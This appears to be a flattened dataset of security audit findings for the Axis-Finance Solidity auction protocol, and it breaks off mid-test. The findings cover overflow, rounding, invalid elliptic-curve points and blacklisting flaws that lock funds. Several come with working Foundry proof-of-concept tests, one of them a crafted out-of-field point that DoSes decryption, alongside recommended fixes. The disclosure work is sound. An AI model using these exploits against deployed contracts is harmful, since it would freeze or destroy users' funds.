returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n -Bidders' funds may become locked due to inconsistent price order checks in MaxPriorityQueue and the _claimBid function.чhighчIn the `MaxPriorityQueue`, `bids` are ordered by decreasing `price`. We calculate the `marginal price`, `marginal bid ID`, and determine the `auction winners`. When a `bidder` wants to claim, we verify that the `bid price` of this `bidder` exceeds the `marginal price`. However, there's minor inconsistency: certain `bids` may have `marginal price` and a smaller `bid ID` than `marginal bid ID` and they are not actually `winners`. As a result, the `auction winners` and these `bidders` can receive `base` tokens. However, there is a finite supply of `base` tokens for `auction winners`. Early `bidders` who claim can receive `base` tokens, but the last `bidders` can not.\\nThe comparison for the order of `bids` in the `MaxPriorityQueue` is as follow: if `q1 * b2 < q2 * b1` then `bid (q2, b2)` takes precedence over `bid (q1, b1)`.\\n```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n\\nAnd in the `_calimBid` function, the `price` is checked directly as follow: if q * 10 ** baseDecimal / b >= marginal `price`, then this `bid` can be claimed.\\n```\\nfunction _claimBid(\\n uint96 lotId_,\\n uint64 bidId_\\n) internal returns (BidClaim memory bidClaim, bytes memory auctionOutput_) {\\n uint96 price = uint96(\\n bidData.minAmountOut == 0\\n ? 0 // TODO technically minAmountOut == 0 should be an infinite price, but need to check that later. Need to be careful we don't introduce a way to claim a bid when we set marginalPrice to type(uint96).max when it cannot be settled.\\n : Math.mulDivUp(uint256(bidData.amount), baseScale, uint256(bidData.minAmountOut))\\n );\\n uint96 marginalPrice = auctionData[lotId_].marginalPrice;\\n if (\\n price > marginalPrice\\n || (price == marginalPrice && bidId_ <= auctionData[lotId_].marginalBidId)\\n ) { }\\n}\\n```\\n\\nThe issue is that a `bid` with the `marginal price` might being placed after marginal `bid` in the `MaxPriorityQueue` due to rounding.\\n```\\nq1 * b2 < q2 * b1, but mulDivUp(q1, 10 ** baseDecimal, b1) = mulDivUp(q2, 10 ** baseDecimal, b2)\\n```\\n\\nLet me take an example. The `capacity` is `10e18` and there are `6 bids` ((4e18 + 1, 2e18) for first `bidder`, `(4e18 + 2, 2e18)` for the other `bidders`. The order in the `MaxPriorityQueue` is `(2, 3, 4, 5, `6`, 1)`. The `marginal bid ID` is `6`. The `marginal price` is `2e18` + 1. The `auction winners` are `(2, 3, 4, 5, 6)`. However, `bidder` 1 can also claim because it's `price` matches the `marginal price` and it has the smallest `bid ID`. There are only `10e18` `base` tokens, but all `6 bidders` require `2e18` `base` tokens. As a result, at least one `bidder` won't be able to claim `base` tokens, and his `quote` tokens will remain locked in the `auction house`.\\nThe Log is\\n```\\nmarginal price ==> 2000000000000000001\\nmarginal bid id ==> 6\\n\\npaid to bid 1 ==> 4000000000000000001\\npayout to bid 1 ==> 1999999999999999999\\n*****\\npaid to bid 2 ==> 4000000000000000002\\npayout to bid 2 ==> 2000000000000000000\\n*****\\npaid to bid 3 ==> 4000000000000000002\\npayout to bid 3 ==> 2000000000000000000\\n*****\\npaid to bid 4 ==> 4000000000000000002\\npayout to bid 4 ==> 2000000000000000000\\n*****\\npaid to bid 5 ==> 4000000000000000002\\npayout to bid 5 ==> 2000000000000000000\\n*****\\npaid to bid 6 ==> 4000000000000000002\\npayout to bid 6 ==> 2000000000000000000\\n```\\n\\nPlease add below test to the `test/modules/auctions/EMPA/claimBids.t.sol`\\n```\\nfunction test_claim_nonClaimable_bid()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(4e18 + 1, 2e18) // bidId = 1\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 2\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 3\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 4\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 5\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 6\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n EncryptedMarginalPriceAuctionModule.AuctionData memory auctionData = _getAuctionData(_lotId);\\n\\n console2.log('marginal price ==> ', auctionData.marginalPrice);\\n console2.log('marginal bid id ==> ', auctionData.marginalBidId);\\n console2.log('');\\n\\n for (uint64 i; i < 6; i ++) {\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = i + 1;\\n vm.prank(address(_auctionHouse));\\n (Auction.BidClaim[] memory bidClaims,) = _module.claimBids(_lotId, bidIds);\\n Auction.BidClaim memory bidClaim = bidClaims[0];\\n if (i > 0) {\\n console2.log('*****');\\n }\\n console2.log('paid to bid ', i + 1, ' ==> ', bidClaim.paid);\\n console2.log('payout to bid ', i + 1, ' ==> ', bidClaim.payout);\\n }\\n}\\n```\\nчIn the `MaxPriorityQueue`, we should check the price: `Math.mulDivUp(q, 10 ** baseDecimal, b)`.чч```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n -Overflow in curate() function, results in permanently stuck fundsчhighчThe `Axis-Finance` protocol has a curate() function that can be used to set a certain fee to a curator set by the seller for a certain auction. Typically, a curator is providing some service to an auction seller to help the sale succeed. This could be doing diligence on the project and `vouching` for them, or something simpler, such as listing the auction on a popular interface. A lot of memecoins have a big supply in the trillions, for example SHIBA INU has a total supply of nearly 1000 trillion tokens and each token has 18 decimals. With a lot of new memecoins emerging every day due to the favorable bullish conditions and having supply in the trillions, it is safe to assume that such protocols will interact with the `Axis-Finance` protocol. Creating auctions for big amounts, and promising big fees to some celebrities or influencers to promote their project. The funding parameter in the Routing struct is of type `uint96`\\n```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n\\nThe max amount of tokens with 18 decimals a `uint96` variable can hold is around 80 billion. The problem arises in the curate() function, If the auction is prefunded, which all batch auctions are( a normal FPAM auction can also be prefunded), and the amount of prefunded tokens is big enough, close to 80 billion tokens with 18 decimals, and the curator fee is for example 7.5%, when the `curatorFeePayout` is added to the current funding, the funding will overflow.\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nGist After following the steps in the above mentioned gist, add the following test to the `AuditorTests.t.sol`\\n```\\nfunction test_CuratorFeeOverflow() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = \"\";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, 100_000_000_000e18);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18),\\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: abi.encode(\"\"),\\n derivativeType: toKeycode(\"\"),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(owner);\\n FeeManager.FeeType type_ = FeeManager.FeeType.MaxCurator;\\n uint48 fee = 7_500; // 7.5% max curator fee\\n auctionHouse.setFee(keycode, type_, fee);\\n vm.stopPrank();\\n\\n vm.startPrank(curator);\\n uint96 fundingBeforeCuratorFee;\\n uint96 fundingAfterCuratorFee;\\n (,fundingBeforeCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized before curator fee is set: \", fundingBeforeCuratorFee/1e18);\\n auctionHouse.setCuratorFee(keycode, fee);\\n bytes memory callbackData_ = \"\";\\n auctionHouse.curate(0, callbackData_);\\n (,fundingAfterCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized after curator fee is set: \", fundingAfterCuratorFee/1e18);\\n console2.log(\"Balance of base token of the auction house: \", mockBaseToken.balanceOf(address(auctionHouse))/1e18);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before curator fee is set: 75000000000\\n Here is the funding normalized after curator fee is set: 1396837485\\n Balance of base token of the auction house: 80625000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_CuratorFeeOverflow`чEither remove the unchecked block\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nso that when overflow occurs, the transaction will revert, or better yet also change the funding variable type from `uint96` to `uint256` this way sellers can create big enough auctions, and provide sufficient curator fee in order to bootstrap their protocol successfully .чIf there is an overflow occurs in the curate() function, a big portion of the tokens will be stuck in the `Axis-Finance` protocol forever, as there is no way for them to be withdrawn, either by an admin function, or by canceling the auction (if an auction has started, only FPAM auctions can be canceled), as the amount returned is calculated in the following way\\n```\\n if (routing.funding > 0) {\\n uint96 funding = routing.funding;\\n\\n // Set to 0 before transfer to avoid re-entrancy\\n routing.funding = 0;\\n\\n // Transfer the base tokens to the appropriate contract\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n funding,\\n false\\n );\\n // rest of code\\n }\\n```\\nч```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n -It is possible to DoS batch auctions by submitting invalid AltBn128 points when biddingчhighчBidders can submit invalid points for the AltBn128 elliptic curve. The invalid points will make the decrypting process always revert, effectively DoSing the auction process, and locking funds forever in the protocol.\\nAxis finance supports a sealed-auction type of auctions, which is achieved in the Encrypted Marginal Price Auction module by leveraging the ECIES encryption scheme. Axis will specifically use a simplified ECIES implementation that uses the AltBn128 curve, which is a curve with generator point (1,2) and the following formula:\\n$$ y^2 = x^3 + 3 $$\\nBidders will submit encrypted bids to the protocol. One of the parameters required to be submitted by the bidders so that bids can later be decrypted is a public key that will be used in the EMPA decryption process:\\n```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n\\nAs shown in the code snippet, bidders will submit a `bidPubKey`, which consists in an x and y coordinate (this is actually the public key, which can be represented as a point with x and y coordinates over an elliptic curve).\\nThe `bidPubKey` point will then be validated by the ECIES library's `isValid()` function. Essentially, this function will perform three checks:\\nVerify that the point provided is on the AltBn128 curve\\nEnsure the x and y coordinates of the point provided don't correspond to the generator point (1, 2)\\nEnsure that the x and y coordinates of the point provided don't corrspond to the point at infinity (0,0)\\n```\\n// ECIES.sol\\n\\nfunction isOnBn128(Point memory p) public pure returns (bool) {\\n // check if the provided point is on the bn128 curve y**2 = x**3 + 3, which has generator point (1, 2)\\n return _fieldmul(p.y, p.y) == _fieldadd(_fieldmul(p.x, _fieldmul(p.x, p.x)), 3);\\n }\\n \\n /// @notice Checks whether a point is valid. We consider a point valid if it is on the curve and not the generator point or the point at infinity.\\n function isValid(Point memory p) public pure returns (bool) { \\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n }\\n```\\n\\nAlthough these checks are correct, one important check is missing in order to consider that the point is actually a valid point in the AltBn128 curve.\\nAs a summary, ECC incorporates the concept of finite fields. Essentially, the elliptic curve is considered as a square matrix of size pxp, where p is the finite field (in our case, the finite field defined in Axis' `ECIES.sol` library is stord in the `FIELD_MODULUS` constant with a value of 21888242871839275222246405745257275088696311157297823662689037894645226208583). The curve equation then takes this form:\\n$$ y2 = x^3 + ax + b (mod p) $$\\nNote that because the function is now limited to a field of pxp, any point provided that has an x or y coordinate greater than the modulus will fall outside of the matrix, thus being invalid. In other words, if x > p or y > p, the point should be considered invalid. However, as shown in the previous snippet of code, this check is not performed in Axis' ECIES implementation.\\nThis enables a malicious bidder to provide an invalid point with an x or y coordinate greater than the field, but that still passes the checked conditions in the ECIES library. The `isValid()` check will pass and the bid will be successfully submitted, although the public key is theoretically invalid.\\nThis leads us to the second part of the attack. When the auction concludes, the decryption process will begin. The process consists in:\\nCalling the `decryptAndSortBids()` function. This will trigger the internal `_decryptAndSortBids()` function. It is important to note that this function will only set the status of the auction to `Decrypted` if ALL the bids submitted have been decrypted. Otherwise, the auction can't continue.\\n`_decryptAndSortBids()` will call the internal `_decrypt()` function for each of the bids submittted\\n`_decrypt()` will finally call the ECIES' `decrypt()` function so that the bid can be decrypted:\\n// EMPAM.sol\\n\\nfunction _decrypt(\\n uint96 lotId_,\\n uint64 bidId_,\\n uint256 `privateKey_`\\n ) internal view returns (uint256 amountOut) {\\n // Load the encrypted bid data\\n EncryptedBid memory encryptedBid = encryptedBids[lotId_][bidId_];\\n\\n // Decrypt the message\\n // We expect a salt calculated as the keccak256 hash of lot id, bidder, and amount to provide some (not total) uniqueness to the encryption, even if the same shared secret is used\\n Bid storage bidData = bids[lotId_][bidId_];\\n uint256 message = ECIES.decrypt(\\n encryptedBid.encryptedAmountOut,\\n `encryptedBid.bidPubKey`, \\n `privateKey_`, \\n uint256(keccak256(abi.encodePacked(lotId_, bidData.bidder, bidData.amount))) // @audit-issue [MEDIUM] - Missing bidId in salt creates the edge case where a bid susceptible of being discovered if a user places two bids with the same input amount. Because the same key will be used when performing the XOR, the symmetric key can be extracted, thus potentially revealing the bid amounts.\\n ); \\n \\n \\n ...\\n } \\nAs shown in the code snippet, one of the parameters passed to the `ECIES.decrypt()` function will be the `encryptedBid.bidPubKey` (the invalid point provided by the malicious bidder). As we can see, the first step performed by `ECIES.decrypt()` will be to call the `recoverSharedSecret()` function, passing the invalid public key (ciphertextPubKey_) and the auction's global `privateKey_` as parameter:\\n// ECIES.sol\\n\\nfunction decrypt(\\n uint256 ciphertext_,\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`,\\n uint256 salt_\\n ) public view returns (uint256 message_) {\\n // Calculate the shared secret\\n // Validates the ciphertext public key is on the curve and the private key is valid\\n uint256 sharedSecret = recoverSharedSecret(ciphertextPubKey_, privateKey_);\\n\\n ...\\n }\\n \\n function recoverSharedSecret(\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`\\n ) public view returns (uint256) {\\n ...\\n \\n Point memory p = _ecMul(ciphertextPubKey_, privateKey_);\\n\\n return p.x;\\n }\\n \\n function _ecMul(Point memory p, uint256 scalar) private view returns (Point memory p2) {\\n (bool success, bytes memory output) =\\n address(0x07).staticcall{gas: 6000}(abi.encode(p.x, p.y, scalar));\\n\\n if (!success || output.length == 0) revert(\"ecMul failed.\");\\n\\n p2 = abi.decode(output, (Point));\\n }\\nAmong other things, `recoverSharedSecret()` will execute a scalar multiplication between the invalid public key and the global private key via the `ecMul` precompile. This is where the denial of servide will take place.\\nThe ecMul precompile contract was incorporated in EIP-196. Checking the EIP's exact semantics section, we can see that inputs will be considered invalid if “… any of the field elements (point coordinates) is equal or larger than the field modulus p, the contract fails”. Because the point submitted by the bidder had one of the x or y coordinates bigger than the field modulus p (because Axis never validated that such value was smaller than the field), the call to the ecmul precompile will fail, reverting with the “ecMul failed.” error.\\nBecause the decryption process expects ALL the bids submitted for an auction to be decrypted prior to actually setting the auctions state to `Decrypted`, if only one bid decryption fails, the decryption process won't be completed, and the whole auction process (decrypting, settling, …) won't be executable because the auction never reaches the `Decrypted` state.\\nProof of Concept\\nThe following proof of concept shows a reproduction of the attack mentioned above. In order to reproduce it, following these steps:\\nInside `EMPAModuleTest.sol`, change the `_createBidData()` function so that it uses the (21888242871839275222246405745257275088696311157297823662689037894645226208584, 2) point instead of the `_bidPublicKey` variable. This is a valid point as per Axis' checks, but it is actually invalid given that the x coordinate is greater than the field modulus:\\n`// EMPAModuleTest.t.sol\\n\\nfunction _createBidData(\\n address bidder_,\\n uint96 amountIn_,\\n uint96 amountOut_\\n ) internal view returns (bytes memory) {\\n uint256 encryptedAmountOut = _encryptBid(_lotId, bidder_, amountIn_, amountOut_);\\n \\n- return abi.encode(encryptedAmountOut, _bidPublicKey);\\n+ return abi.encode(encryptedAmountOut, Point({x: 21888242871839275222246405745257275088696311157297823662689037894645226208584, y: 2}));\\n } `\\nPaste the following code in moonraker/test/modules/auctions/EMPA/decryptAndSortBids.t.sol:\\n`// decryptAndSortBids.t.sol\\n\\nfunction testBugdosDecryption()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenLotHasConcluded \\n givenPrivateKeyIsSubmitted\\n {\\n\\n vm.expectRevert(\"ecMul failed.\");\\n _module.decryptAndSortBids(_lotId, 1);\\n\\n }`\\nRun the test inside `moonraker` with the following command: `forge test --mt testBugdosDecryption`чEnsure that the x and y coordinates are smaller than the field modulus inside the `ECIES.sol` `isValid()` function, adding the `p.x < FIELD_MODULUS && p.y < FIELD_MODULUS` check so that invalid points can't be submitted:\\n```\\n// ECIES.sol\\n\\nfunction isValid(Point memory p) public pure returns (bool) { \\n// Remove the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n// Add the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0) && (p.x < FIELD_MODULUS && p.y < FIELD_MODULUS); \\n }\\n```\\nчHigh. A malicious bidder can effectively DoS the decryption process, which will prevent all actions in the protocol from being executed. This attack will make all the bids and prefunded auction funds remain stuck forever in the contract, because all the functions related to the post-concluded auction steps expect the bids to be first decrypted.ч```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n -Downcasting to uint96 can cause assets to be lost for some tokensчhighчDowncasting to uint96 can cause assets to be lost for some tokens\\nAfter summing the individual bid amounts, the total bid amount is downcasted to uint96 without any checks\\n```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n\\nuint96 can be overflowed for multiple well traded tokens:\\nEg:\\nshiba inu : current price = $0.00003058 value of type(uint96).max tokens ~= 2^96 * 0.00003058 / 10^18 == 2.5 million $\\nHence auctions that receive more than type(uint96).max amount of tokens will be downcasted leading to extreme loss for the auctionerчUse a higher type or warn the user's of the limitations on the auction sizesчThe auctioner will suffer extreme loss in situations where the auctions bring in >uint96 amount of tokensч```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n -Incorrect `prefundingRefund` calculation will disallow claimingчhighчIncorrect `prefundingRefund` calculation will lead to underflow and hence disallowing claiming\\nThe `prefundingRefund` variable calculation inside the `claimProceeds` function is incorrect\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n\\nHere `sold` is the total base quantity that has been `sold` to the bidders. Unlike required, the `routing.funding` variable need not be holding `capacity + (0,curator fees)` since it is decremented every time a payout of a bid is claimed\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (bidClaim.payout > 0) {\\n \\n // rest of code\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= bidClaim.payout;\\n }\\n```\\n\\nExample\\nCapacity = 100 prefunded, hence routing.funding == 100 initially Sold = 90 and no partial fill/curation All bidders claim before the claimProceed function is invoked Hence routing.funding = 100 - 90 == 10 When claimProceeds is invoked, underflow and revert:\\nuint96 prefundingRefund = routing.funding + payoutSent_ - sold_ == 10 + 0 - 90чChange the calculation to:\\n```\\nuint96 prefundingRefund = capacity - sold_ + curatorFeesAdjustment (how much was prefunded initially - how much will be sent out based on capacity - sold)\\n```\\nчClaim proceeds function is broken. Sellers won't be able to receive the proceedingsч```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n -If pfBidder gets blacklisted the settlement process would be broken and every other bidders and the seller would lose their fundsчmediumчDuring batch auction settlement, the bidder whos bid was partially filled gets the refund amount in quote tokens and his payout in base immediately. In case if quote or base is a token with blacklisted functionality (e.g. USDC) and bidder's account gets blacklisted after the bid was submitted, the settlement would be bricked and all bidders and the seller would lose their tokens/proceeds.\\nIn the `AuctionHouse.settlement()` function there is a check if the bid was partially filled, in which case the function handles refund and payout immediately:\\n```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // Send refund and payout to the bidder\\n //@audit if pfBidder gets blacklisted the settlement is broken\\n Transfer.transfer(\\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\\n );\\n\\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\\n }\\n```\\n\\nIf `pfBidder` gets blacklisted after he submitted his bid, the call to `settle()` would revert. There is no way for other bidders to get a refund for the auction since settlement can only happen after auction conclusion but the `refundBid()` function needs to be called before the conclusion:\\n```\\n function settle(uint96 lotId_)\\n external\\n virtual\\n override\\n onlyInternal\\n returns (Settlement memory settlement, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfLotActive(lotId_); //@audit\\n _revertIfLotSettled(lotId_);\\n \\n // rest of code\\n}\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_); //@audit\\n\\n // Call implementation-specific logic\\n return _refundBid(lotId_, bidId_, caller_);\\n }\\n```\\n\\nAlso, the `claimBids` function would also revert since the lot wasn't settled and the seller wouldn't be able to get his prefunding back since he can neither `cancel()` the lot nor `claimProceeds()`.чSeparate the payout and refunding logic for pfBidder from the settlement process.чLoss of fundsч```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // Send refund and payout to the bidder\\n //@audit if pfBidder gets blacklisted the settlement is broken\\n Transfer.transfer(\\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\\n );\\n\\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\\n }\\n```\\n -Unsold tokens from a FPAM auction, will be stuck in the protocol, after the auction concludesчmediumчThe `Axis-Finance` protocol allows sellers to create two types of auctions: FPAM & EMPAM. An FPAM auction allows sellers to set a price, and a maxPayout, as well as create a prefunded auction. The seller of a FPAM auction can cancel it while it is still active by calling the cancel function which in turn calls the cancelAuction() function. If the auction is prefunded, and canceled while still active, all remaining funds will be transferred back to the seller. The problem arises if an FPAM prefunded auction is created, not all of the prefunded supply is bought by users, and the auction concludes. There is no way for the `baseTokens` still in the contract, to be withdrawn from the protocol, and they will be forever stuck in the `Axis-Finance` protocol. As can be seen from the below code snippet cancelAuction() function checks if an auction is concluded, and if it is the function reverts.\\n```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n\\nGist After following the steps in the above mentioned gist add the following test to the `AuditorTests.t.sol` file\\n```\\nfunction test_FundedPriceAuctionStuckFunds() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = \"\";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, lotCapacity);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18), \\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: abi.encode(\"\"),\\n derivativeType: toKeycode(\"\"),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(bob);\\n uint96 fundingBeforePurchase;\\n uint96 fundingAfterPurchase;\\n (,fundingBeforePurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized before purchase: \", fundingBeforePurchase/1e18);\\n mockQuoteToken.mint(bob, 10_000_000_000e18);\\n mockQuoteToken.approve(address(auctionHouse), type(uint256).max);\\n Router.PurchaseParams memory purchaseParams = Router.PurchaseParams({\\n recipient: bob,\\n referrer: address(0),\\n lotId: 0,\\n amount: 10_000_000_000e18,\\n minAmountOut: 10_000_000_000e18,\\n auctionData: abi.encode(0),\\n permit2Data: \"\"\\n });\\n bytes memory callbackData = \"\";\\n auctionHouse.purchase(purchaseParams, callbackData);\\n (,fundingAfterPurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized after purchase: \", fundingAfterPurchase/1e18);\\n console2.log(\"Balance of seler of quote tokens: \", mockQuoteToken.balanceOf(alice)/1e18);\\n console2.log(\"Balance of bob in base token: \", mockBaseToken.balanceOf(bob)/1e18);\\n console2.log(\"Balance of auction house in base token: \", 